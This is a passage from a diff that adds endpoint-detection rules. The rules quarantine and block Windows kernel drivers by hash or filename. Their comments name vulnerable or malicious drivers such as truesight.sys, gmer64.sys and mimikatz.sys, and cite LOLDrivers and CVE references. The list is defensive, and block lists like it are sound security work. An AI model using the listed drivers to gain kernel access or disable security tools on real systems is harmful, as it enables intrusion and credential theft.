+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.478346Z",
+ "creation_date": "2026-03-23T11:45:30.478349Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.478358Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "775000c4083c8e4dcfc879d83fcd27b40b46820c9834ae4662861386a4d81fe9",
+ "comment": "Vulnerable Kernel Driver (aka vboxdrv.sys) [https://www.loldrivers.io/drivers/2da3a276-9e38-4ee6-903d-d15f7c355e7c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "05c4cbca-396e-52e4-9737-cacdba3d2697",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827107Z",
+ "creation_date": "2026-03-23T11:45:30.827109Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827114Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b8f3814646ffa58ca9729760b5e0d37396273a0649583cbad1f72909fa452892",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "05cf2af0-8a0e-50a9-be37-4e57d392de47",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605376Z",
+ "creation_date": "2026-03-23T11:45:29.605379Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605384Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "filename",
+ "value": "kprocesshacker.sys",
+ "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "05e7fd7d-2794-5963-acae-125e302754e6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978773Z",
+ "creation_date": "2026-03-23T11:45:29.978775Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978781Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3913d9754b78182aa25d38fbd7ea02502bdf1d81e6525ab4b5ffe5f543200478",
+ "comment": "Malicious Kernel Driver (aka gmer64.sys) [https://www.loldrivers.io/drivers/7ce8fb06-46eb-4f4f-90d5-5518a6561f15/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "05f6a82d-e43f-51d3-907a-e07fd0e52c29",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160623Z",
+ "creation_date": "2026-03-23T11:45:31.160625Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160632Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "555c77bc0c4f700d6b5dde9e0fade8366187ead215f4a5f15378d6e4395f3d7a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "05fe4632-59a6-5051-8754-21c32a8cdd48",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150106Z",
+ "creation_date": "2026-03-23T11:45:31.150108Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150114Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fa3511eb499b94646617a2bb4254c5e435bb8fcdc706d6ee0bc3019907c21146",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "060d23a5-7edc-51a4-b217-f718b7894f21",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146474Z",
+ "creation_date": "2026-03-23T11:45:31.146476Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146482Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "62e71e3ec19c2a37a1ab793cb11c84f6de3c2b33765b1eba8b281a55677a97a4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "06108c7f-8ef1-50d8-9153-e017dc1456a4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.830107Z",
+ "creation_date": "2026-03-23T11:45:31.830109Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.830114Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "654a050581e50d3be2d714ad9012d01f88024298b46c1bae50a556fa16345776",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "061cbb6d-0e35-5277-a7ce-2fdeb0b2988a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143236Z",
+ "creation_date": "2026-03-23T11:45:31.143238Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143243Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6f021fb4514087b1b6b11ea6b5a9c5edb589900c61448fff4e213fcea0cba6a7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "061fddfc-1028-5872-ad98-bc3b268b440e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618620Z",
+ "creation_date": "2026-03-23T11:45:29.618622Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618628Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3ac5e01689a3d745e60925bc7faca8d4306ae693e803b5e19c94906dc30add46",
+ "comment": "Vulnerable Kernel Driver (aka fidpcidrv64.sys) [https://www.loldrivers.io/drivers/a005e057-c84f-47cd-9b4b-5b1e51a06ab4/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "062c715f-e8a4-531d-8989-505021f79c89",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.453103Z",
+ "creation_date": "2026-03-23T11:45:30.453106Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.453115Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "00b3ff11585c2527b9e1c140fd57cb70b18fd0b775ec87e9646603056622a1fd",
+ "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0630d6fc-0fd0-5e82-8113-b70a8cf8c82f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825734Z",
+ "creation_date": "2026-03-23T11:45:31.825736Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825741Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "34f43f48836d007907b570556ef8374485de44c0772a31b4bfb3da0d9fb0cad7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0635e83a-2aa2-5fb7-91e2-b9a931abca1b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618677Z",
+ "creation_date": "2026-03-23T11:45:29.618679Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618684Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b62ecd7eccde402456eab582b49705cc77065d7015e7d92bbc06e0fcff097e58",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "064ad0c1-53c5-5170-be1d-a62adc279719",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487943Z",
+ "creation_date": "2026-03-23T11:45:31.487945Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487959Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "caccf1965f77b49df12b2620952d6806bb8371ec6e344b055cad624318b75b99",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "064da8f4-2bdb-599b-a329-95e44e4a3bb4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.462469Z",
+ "creation_date": "2026-03-23T11:45:30.462480Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.462489Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "36487117894ca7b93f704e26f22725827f6f04ec3b8c45eaa0d283a11de9a9c3",
+ "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "06509c64-b674-55d4-9c17-499f4545c9aa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616273Z",
+ "creation_date": "2026-03-23T11:45:29.616275Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616284Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a7c8f4faf3cbb088cac7753d81f8ec4c38ccb97cd9da817741f49272e8d01200",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "065ffb3c-2da3-51ee-be53-e962555d4e02",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984244Z",
+ "creation_date": "2026-03-23T11:45:29.984246Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984252Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9ee33ffd80611a13779df6286c1e04d3c151f1e2f65e3d664a08997fcd098ef3",
+ "comment": "Vulnerable Kernel Driver (aka EneIo64.sys) [https://www.loldrivers.io/drivers/90ecbbf7-b02f-424d-8b7d-56cc9e3b5873/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "06615c0c-228f-512b-8133-3a258f2de2cf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143687Z",
+ "creation_date": "2026-03-23T11:45:32.143689Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143695Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3f085bc766d865fa012163ed7c044af25285525b1276b6cef2085efab78e9b66",
+ "comment": "Vulnerable Kernel Driver (aka DcProtect.sys) [https://www.loldrivers.io/drivers/7cee2ce8-7881-4a9a-bb18-61587c95f4a2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "06687483-5a24-5d21-ac75-81bdb46e0b2a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829628Z",
+ "creation_date": "2026-03-23T11:45:31.829630Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829636Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e4b9295eef82a88012a2ae5a1987e3050a5b9a16862b7772c2f48bd2e36f7cff",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "066e77b3-da67-5b0f-8311-335135a536fa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.816575Z",
+ "creation_date": "2026-03-23T11:45:31.816579Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.816587Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "539bc7e214d332c57c6f15612866fcc28ea26a98b59e9ef61a5c1741ab221ae0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "067cf797-ab30-5ff8-94d0-01f304adb096",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971361Z",
+ "creation_date": "2026-03-23T11:45:29.971365Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971374Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7cb594af6a3655daebc9fad9c8abf2417b00ba31dcd118707824e5316fc0cc21",
+ "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "068025b9-3a38-50b5-9a3b-30c14ea6e256",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975931Z",
+ "creation_date": "2026-03-23T11:45:29.975934Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975939Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b4c2ef76c204273132fde38f0ded641c2c5ee767652e64e4c4071a4a973b6c1b",
+ "comment": "SystemInformer driver (aka systeminformer.sys, formerly known as kprocesshacker.sys) [https://github.com/winsiderss/systeminformer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0684151d-6de4-527e-adf7-c98ac1e3b1eb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829433Z",
+ "creation_date": "2026-03-23T11:45:31.829435Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
